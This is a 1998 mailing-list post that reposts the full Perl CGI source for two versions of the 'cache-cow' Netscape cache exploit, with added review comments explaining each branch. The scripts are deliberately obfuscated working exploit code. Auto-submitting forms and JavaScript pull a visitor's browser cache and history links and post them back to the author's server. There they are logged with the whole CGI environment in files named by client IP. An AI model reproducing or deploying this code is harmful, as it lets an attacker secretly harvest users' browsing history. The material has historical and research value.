
Netscape Cache Exploit - source code


From: jkwilli2 () UNITY NCSU EDU (Ken Williams)
Date: Tue, 29 Sep 1998 13:26:22 -0400


Hi,

Below is source code for the two versions of the Netscape Cache
exploit that was recently discovered by Dan Brumleve
<nothing () shout net>, as found on his web site at
http://www.shout.net/~nothing/cache-cow/index.html

The first version, <cache-cow.cgi>, is listed first, followed by the
second version, <view-cache-cow-4.06.cgi>.

-----snip-----
#!/usr/bin/perl
#
# cache-cow.cgi -- Dan Brumleve <nothing () shout net>, 1998.08.23
#
# Review notes (added; the code below is left byte-for-byte as posted and is
# deliberately obfuscated).  One CGI script plays three roles, selected by
# which CGI environment variables are set:
#   1. PATH_INFO set      -> returns an auto-submitting HTML form whose
#                            <base> is "about:" and whose action is "cache".
#   2. CONTENT_LENGTH set -> reads the POST body, takes the "cache" field,
#                            appends it plus the whole CGI environment to a
#                            per-client log file, and echoes the list back.
#   3. otherwise          -> sends a Location: header whose value is $self
#                            followed by inline HTML/JavaScript that gathers
#                            document.links and POSTs them to $self.
# There is no "use strict"/"use warnings", and the results of open(), read()
# and close() are never checked.

# The script's own URL.  The trailing ";;" is just an empty statement.
my $self = "http://www.shout.net/nothing/cache-cow.cgi";;

if ($ENV{PATH_INFO}) {
  # The heredoc terminator is the two-space-indented "  EOF".  The s/// strips
  # every newline and every run of two spaces, which both removes the line
  # indentation and re-joins the intentionally split tokens ("ba  se" ->
  # "base", "for" + newline + "  m" -> "form").
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><body onLoad="document.f.submit()"><ba  se href="about:"><for
  m name=f action=cache method=post><input type=submit></form></body>
  </html>
  EOF
} elsif ($ENV{CONTENT_LENGTH}) {
  # POST handler.  read() uses CONTENT_LENGTH straight from the request with
  # no upper bound and its return value is ignored.
  # unescape(): '+' -> ' ', then each %XX -> one byte (pack "c" is the
  # signed-char template).  extract(): splits a "name=value" pair on every
  # '=' and keeps only the first two fields, so a value that itself contains
  # '=' is truncated.
  my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
  =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
  sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
  # $history: decode the POST body into a hash, take its "cache" value,
  # split that on '&', decode each "href=..." pair, drop a leading "about:",
  # skip empty values, sort, and join with newlines.  The "#=)" at the end of
  # the next line is only a comment.
  join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
  split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
  # Logging: two-argument open() on the bareword handle FP, in append mode,
  # with the file name built from REMOTE_ADDR and no error check.  Every
  # %ENV entry (whatever the server put in the CGI environment) is written
  # out, then $history.  close() is unchecked, so write errors are lost.
  FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
  $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
  "ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
  "browser:\n\n$history";
} else {
  # Redirect branch.  $url is the heredoc with double spaces and newlines
  # stripped: $self, then "/>" and inline HTML/JavaScript, ending in
  # "<a href=$self".  chunk(s) yields "href=" + escape(s); moo() joins
  # chunk() of every document.links entry with '&'; the body onLoad stores
  # moo() in hidden field "cache" and submits form f to $self.  The Location
  # value is emitted as-is, with no encoding; how a browser treats it is not
  # visible here.
  (my$url=<<"  EOF")=~s/  |\n//g;print"Location: $url\n\n";
  $self/></a></body><script>function chunk(s){return("href=
  "+escape(s));}function moo(){if(!document.links.length){r
  eturn("");}var str=chunk(document.links[0]);var i=documen
  t.links.length;while(--i){str+="&"+chunk(document.links[i
  ]);}return(str);}</script><body onLoad="document.f.cache.
  value=moo();document.f.submit()"><form action="$self" nam
  e=f method=post><input type=hidden name=cache><input type
  =submit></form><a href=$self
  EOF
}

exit 0;
-----snip-----


-----snip-----
#!/usr/bin/perl
#
# cache-cow-4.06.cgi -- Dan Brumleve <nothing () shout net>, 1998.09.26
#
# Review notes (added; the code below is left byte-for-byte as posted and is
# deliberately obfuscated).  Same shape as cache-cow.cgi but with a frameset
# front end.  Roles, selected by CGI environment variable:
#   1. QUERY_STRING set   -> the "cow" frame: check() collects
#                            top.cache.document.links via moo(); if that is
#                            empty it reloads the page, otherwise it stores the
#                            list in hidden field "cache" and submits form f
#                            (target=_top) to $self.
#   2. PATH_INFO set      -> the "cache" frame: auto-submitting form with
#                            <base href="about:"> and action "cache".
#   3. CONTENT_LENGTH set -> POST handler: decodes the "cache" field, appends
#                            it and the whole CGI environment to
#                            logs/log-<REMOTE_ADDR>.txt, echoes it as text/plain.
#   4. otherwise          -> a two-row frameset loading "$self?cow" and
#                            "$self/cache".
# There is no "use strict"/"use warnings", and the results of open(), read()
# and close() are never checked.

# The script's own URL.  The trailing ";;" is just an empty statement.
my $self = "http://www.shout.net/nothing/cache-cow-4.06.cgi";;

if ($ENV{QUERY_STRING}) {
  # The s/// removes every newline and every run of two spaces, re-joining
  # the split tokens ("d.l  inks" -> "d.links", "wh  ile" -> "while", ...).
  # Note the reload() in check() when moo() returns "": the frame keeps
  # reloading until the "cache" frame exposes at least one link.
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><head><script>function chunk(s){return("href=" + escape(s));}
  function moo(d){if(!d.l  inks.length){return("");} var str=chunk(d.
  links[0]);var i=d.links.length;wh  ile(--i){str+="&"+chunk(d.links[
  i]);} return(s  tr);}function check(){ var m=moo(top.cache.document
  ); if (m=="") { docume  nt.location.reload(); return; }document.f.c
  ache.value=m;doc  ument.f.submit();}</script></head><body onLoad="c
  heck()"><form acti  on="$self" name=f target=_top method=post><inpu
  t type=hidden name=cac  he><input type=submit></form></body></html>
  EOF
} elsif ($ENV{PATH_INFO}) {
  # Identical to the PATH_INFO branch of cache-cow.cgi: the form's action
  # "cache" is relative to <base href="about:">.
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><body onLoad="document.f.submit()"><ba  se href="about:"><for
  m name=f action=cache method=post><input type=submit></form></body>
  </html>
  EOF
} elsif ($ENV{CONTENT_LENGTH}) {
  # POST handler, unchanged from cache-cow.cgi.  read() trusts CONTENT_LENGTH
  # with no upper bound and ignores the return value.  unescape(): '+' -> ' ',
  # %XX -> byte.  extract(): splits on every '=' and keeps the first two
  # fields, so values containing '=' are truncated.
  my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
  =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
  sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
  # $history: the "cache" field split on '&', each "href=..." decoded, the
  # "about:" prefix dropped, empties skipped, sorted, newline-joined.  The
  # "#=)" ending the next line is only a comment.
  join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
  split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
  # Two-argument append open() on bareword handle FP, file name from
  # REMOTE_ADDR, no error check; all of %ENV is written, then $history;
  # close() is unchecked.
  FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
  $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
  "ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
  "browser:\n\n$history";
} else {
  # Frameset entry page.  This heredoc is printed as-is (no stripping s///),
  # so its line breaks and two-space indentation remain in the response.
  # The <frameset> is placed inside <head>.
  print"Content-type: text/html\n\n".<<"  EOF";
  <html><head> <frameset rows="1,*"><frame src=
  "$self?cow" name=cow><frame src="$self/cache"
  name=cache></frameset></head></html>
  EOF
}

exit 0;
-----snip-----


--
Ken Williams

Packet Storm Security http://www.Genocide2600.com/~tattooman/index.shtml
E.H.A.P. Corporation  http://www.ehap.org/  ehap () ehap org info () ehap org
NCSU Comp Sci Dept    http://www.csc.ncsu.edu/ jkwilli2 () adm csc ncsu edu
PGP DSS/DH/RSA Keys   http://www4.ncsu.edu/~jkwilli2/pgpkey/

__________________________________________________
Get Your Private, Free Email at http://www.nsa.gov


